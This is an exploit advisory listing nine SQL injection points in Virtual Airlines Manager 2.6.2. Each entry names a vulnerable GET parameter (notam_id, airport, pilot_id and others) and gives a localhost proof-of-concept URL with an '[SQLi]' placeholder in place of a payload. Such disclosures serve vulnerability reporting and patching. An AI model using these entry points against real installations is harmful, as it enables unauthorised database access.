# Exploit Title: Virtual Airlines Manager 2.6.2 - 'airport' SQL Injection
# Google Dork: N/A
# Date: 2020-06-08
# Exploit Author: Kostadin Tonev
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Linux Mint
# CVE : N/A

[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]

[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]

[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]

[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]

[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]

[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]

[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]

[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]